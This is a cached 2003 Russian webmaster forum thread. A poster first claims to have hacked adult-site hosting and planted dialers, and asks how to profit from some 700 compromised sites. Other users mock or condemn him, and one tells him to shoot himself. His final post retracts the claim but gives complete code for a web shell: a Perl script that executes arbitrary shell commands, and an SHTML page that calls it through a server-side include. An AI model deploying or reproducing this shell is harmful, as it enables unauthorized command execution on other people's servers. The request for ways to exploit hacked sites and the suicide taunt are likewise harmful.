Внимание! В связи с устареванием топика эта страница была взята из кэша.
|
Toredo
|
Добавлено: 16/12/03 в 12:49
|
|
Занимался я сиджами в тиновой нише, но че та у меня ничего не получилось. Затратив много времени и не получив с этого денежку, решил взломать свой хостинг. Произошло чудо, в течение минуты я получил шелл на хостинге, мне стало интересно, и я взломал еще 4 спонсорских хостинга. В течение часа я поработил 27 сиджеев. Поставив консоли и диалеры. В итоге сиджеев оказалось очень много, примерно 700 штук. Посоветуйте как более эффетивно можно применить взломанные сайты ?
|
K началу
|
|
|
wolf
|
Добавлено: 16/12/03 в 13:07
|
|
ты ошибся адресом.
|
K началу
|
|
|
Zlo!i +
|
Добавлено: 16/12/03 в 13:07
|
|
Ты охуел совсем чтоль?
|
K началу
|
|
|
sisers
|
Добавлено: 16/12/03 в 13:27
|
|
Застрелиться - для тебя лучший из вариантов.
|
K началу
|
|
|
Black
|
Добавлено: 16/12/03 в 14:21
|
|
1.Дай полные урлы взломаных сайтов. 2.Дай урлы хостинга 3.Оставь пожалуйста свой домашний адрес и телефон и в течении короткого времени мы тебе поможем.
|
K началу
|
|
|
Stek
|
Добавлено: 16/12/03 в 18:09
|
|
Ну про шел я поверю, он как правило со своим паролем ломается А вот про 700 сиджей ... я их даже и не найду столько.
|
K началу
|
|
|
Mоrgan
|
Добавлено: 16/12/03 в 18:34
|
|
По моему кто то прикалуется. Взломать СЖи и сразу об этом написать на форуме который владельцы СЖев читают... Да и матов бы щас в читерах появилось...
|
K началу
|
|
|
SadBoy
|
Добавлено: 16/12/03 в 18:59
|
|
Toredo писал: | В течение часа я поработил 27 сиджеев. |
Саддам отдыхает.
|
K началу
|
|
|
Wahoven
|
Добавлено: 16/12/03 в 19:04
|
|
Mоrgan писал: | По моему кто то прикалуется. Взломать СЖи и сразу об этом написать на форуме который владельцы СЖев читают... Да и матов бы щас в читерах появилось... |
Ну прикалывается-неприкалывается, а админы, почекайте свои хосты на предмет несанкцоинированного доступа..
|
K началу
|
|
|
Voland
|
Добавлено: 16/12/03 в 19:23
|
|
Кому-то скчно стало... Решил приколоться...
|
K началу
|
|
|
Toredo
|
Добавлено: 20/12/03 в 10:10
|
|
Вижу многим стало интересно. Скажу что, сиджи я не взламывал, консоли и диалеры не ставил. Я хочу вам показать какие проблемы могут возникнуть в вашей работе и какие последствия могут вас ожидать. А последствия, как видно, многим не нравятся (вплоть до ритуального самоубийства) Эта дыра актуальна и достаточно банальна для всех хостов с сиджеями. Знающие люди поймут. Пишем 2 файла test.pl и test.shtml. кидаем в CGI-BIN и через браузер запускаем test.shtml и в верхней части пишем команды шелла (cat, less ...) в нижней части будет результат команды. Не забываем редактировать test.shtml в нем прописываем путь к перлу и путь на сервере к файлу test.pl
Содержание test.pl
#! /usr/bin/perl my $in = $ARGV[0]; $in = substr($in, 4); $in =~ s/\+/ /g; $in =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $in =~ s/\r//g; my @cmd = split(/\n/, $in); my $out = ""; foreach (@cmd) { $out .= "===============Команда $_================\n"; $out .= `$_`; $out =~ tr/ / /s; } print $out; exit;
Содержание test.shtml <html> <head> <title>Shell</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body> <form action="test.shtml" method="get"> <textarea name="cmd" rows="10" cols="100"></textarea><br> <input type="submit" value="Отправить"> </form> <textarea cols="150" rows="20"> <!--#exec cmd="/usr/bin/perl /путь на сервере к файлу/test.pl $QUERY_STRING" --> </textarea> </body> </html>
|
K началу
|
|
|
Текстовая реклама в форме ответа Заголовок и до четырех строчек текста Длина текста до 350 символов Купить рекламу в этом месте! |
Внимание! В связи с устареванием топика эта страница была взята из кэша.
|